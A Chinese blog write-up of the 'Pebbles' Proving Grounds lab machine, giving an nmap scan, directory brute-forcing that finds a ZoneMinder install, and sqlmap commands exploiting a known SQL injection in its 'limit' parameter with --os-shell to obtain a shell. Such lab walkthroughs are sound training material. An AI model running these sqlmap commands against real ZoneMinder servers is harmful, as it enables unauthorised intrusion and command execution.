Pebbles pg walkthrough Easy

时间：2025-01-17 18:43:10浏览次数：1

标签：Pebbles http Ubuntu Linux cpe 192.168 walkthrough pg linux

NMAP

┌──(root㉿kali)-[/home/ftpuserr]
└─# nmap -p- -A -sS 192.168.239.52
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-17 06:26 UTC
Nmap scan report for 192.168.239.52
Host is up (0.071s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aa:cf:5a:93:47:18:0e:7f:3d:6d:a5:af:f8:6a:a5:1e (RSA)
|   256 c7:63:6c:8a:b5:a7:6f:05:bf:d0:e3:90:b5:b8:96:58 (ECDSA)
|_  256 93:b2:6a:11:63:86:1b:5e:f5:89:58:52:89:7f:f3:42 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Pebbles
|_http-server-header: Apache/2.4.18 (Ubuntu)
3305/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8080/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-title: Tomcat
|_http-favicon: Apache Tomcat
|_http-server-header: Apache/2.4.18 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|storage-misc
Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (97%), Google Android 8.X (91%), Synology DiskStation Manager 7.X (88%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:google:android:8 cpe:/o:linux:linux_kernel:2.6 cpe:/a:synology:diskstation_manager:7.1 cpe:/o:linux:linux_kernel:4.4
Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.13 - 4.4 (97%), Linux 3.2 - 4.14 (97%), Linux 3.8 - 3.16 (97%), Android 8 - 9 (Linux 3.18 - 4.4) (91%), Linux 2.6.32 - 3.13 (91%), Linux 2.6.32 - 3.10 (91%), Linux 3.11 - 4.9 (91%), Linux 4.4 (90%), Linux 3.16 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8080/tcp)
HOP RTT      ADDRESS
1   70.33 ms 192.168.45.1
2   70.31 ms 192.168.45.254
3   71.73 ms 192.168.251.1
4   71.69 ms 192.168.239.52

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 127.54 seconds

80端口

试了几个弱口令都不行
dirsearch直接开扫

8080端口是tomcat

没啥好看的 dirsearch直接开扫

3305端口是apache页面

dirsearch直接开扫

ftp端口尝试爆破也没成功

好吧一点线索没发现
于是我掏出大字典继续浅浅的扫一下吧
dirb http://192.168.239.52 /usr/share/dirb/wordlists/big.txt

睡了一觉起来发现扫出东西了
有个zm的路径

我们能个发现他暴露了版本

搜exp试试看
https://www.exploit-db.com/exploits/41239 里面有个sql注入
发现sql注入

好吧又是盲注盲注太难手注了还是上sqlmap吧
sqlmap http://192.168.239.52/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" -p limit
确实可以
sqlmap http://192.168.239.52/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" -p limit --os-shell
尝试拿到shell

成功

标签：Pebbles,http,Ubuntu,Linux,cpe,192.168,walkthrough,pg,linux
From： https://www.cnblogs.com/wssw/p/18677526

FPGA 基于 Vivado 核的双口 RAM 设计与实现
FPGA基于Vivado核的双口RAM设计与实现介绍双口RAM(Dual-portRAM)是一种支持两个独立端口同时进行读写操作的存储器。这种架构在需要高并发数据访问的系统中非常有用。Vivado提供了方便的IP核来快速实现双口RAM，适用于各种FPGA设计。应用使用场景信号处理......
专为高性能计算和低功耗应用设计的MPF100T-1FCVG484E MPF100TL-FCSG325E MPF100TL-FCV
‌PolarFireFPGA是Microchip推出的一款高性能、低功耗的FPGA产品系列，特别适用于各种需要高性能计算和低功耗的应用场景‌。这些器件包括MPF100T-1FCVG484EMPF100TL-FCG484EMPF100TL-FCG484IMPF100TL-FCSG325EMPF100TL-FCVG484EMPF100TL-FCVG484IFPGA-现场可编程门阵列......
【教程4＞第5章＞第11节】QPSK调制与相位偏差模拟FPGA实现
本课程学习成果预览欢迎订阅FPGA/MATLAB/Simulink系列教程《★教程1:matlab入门100例》《★教程2:fpga入门100例》《★教程3:simulink入门60例》《★教程4:FPGA/MATLAB/Simulink联合开发入门与进阶X例》目录1.软件版本2.QPSK调制理论简介3.QPSK调制与相位偏差模拟......
如何在红旗系统安装PGSQL数据库
红旗系统安装PGSQL教程一、下载pgsql源码二、创建pgsql用户三、创建pgsql目录四、解压源码五、配置构建环境六、编译和安装七、创建数据库目录八、初始化数据库集群九、启动数据库十、添加环境变量十一、连接数据库十二、创建数据库用户十三、外部连接工具访问设置一......
pg数据库下关于时间日期的取值
--century世纪selectdate_part('century',now()::TIMESTAMP);--day天selectdate_part('day',now()::TIMESTAMP);--decade十年，即年份除以10selectdate_part('decade',now()::TIMESTAMP);--dow星期（星期天0，星期六6）selectdate_part('do......
pg_controldata的使用方法
[omm@txy~]$pg_controldata/openGauss/data/dnpg_controlversionnumber:923Catalogversionnumber:201611171Databasesystemidentifier:5932367657193972969Databaseclusterstate:inproductionpg_contr......
Symbolic pg walkthrough Intermediate window 利用302进行文件csrf
nmapnmap-p--A-sS-T4192.168.239.177StartingNmap7.95(https://nmap.org)at2025-01-1503:39UTCNmapscanreportfor192.168.239.177Hostisup(0.071slatency).Notshown:65533filteredtcpports(no-response)PORTSTATESERVICEVERSION22/tc......
【PCIE734-1 】基于 PCIe 总线架构的 XCKU060 FPGA 4 路 SFP+光纤通道处理平台
产品概述PCIE734-1 是一款基于 PCIE 总线架构的 KintexUltraScale 系列 XCKU060FPGA 高性能 4 路 SFP+光纤数据处理平台。该平台具有 1 个 PCIeGen3x8 主机接口、4 个 SFP+10G 光纤接口，可以实现 4 路 SFP+10G 光纤的数据实时采集、处理、传输。板卡......
基于FPGA的多功能数字钟设计
基于FPGA的多功能数字钟设计前言基础知识按键数码管系统概述按键使用说明模块描述模块设计button_debouncebutton_controllerclock_controllerdigital_tube整体资源用量测试视频前言本工程主要是数码管、按键、LED的应用开发。注：本工程所有IP均使用源码开发。基......
Pipe pg walkthrough Intermediate
NAMP┌──(root?kali)-[~]└─#nmap-p--A192.168.128.45StartingNmap7.95(https://nmap.org)at2025-01-1407:03UTCStats:0:00:40elapsed;0hostscompleted(1up),1undergoingScriptScanNSETiming:About99.30%done;ETC:07:04(0:00:00remainin......

Pebbles pg walkthrough Easy

相关文章

赞助商

阅读排行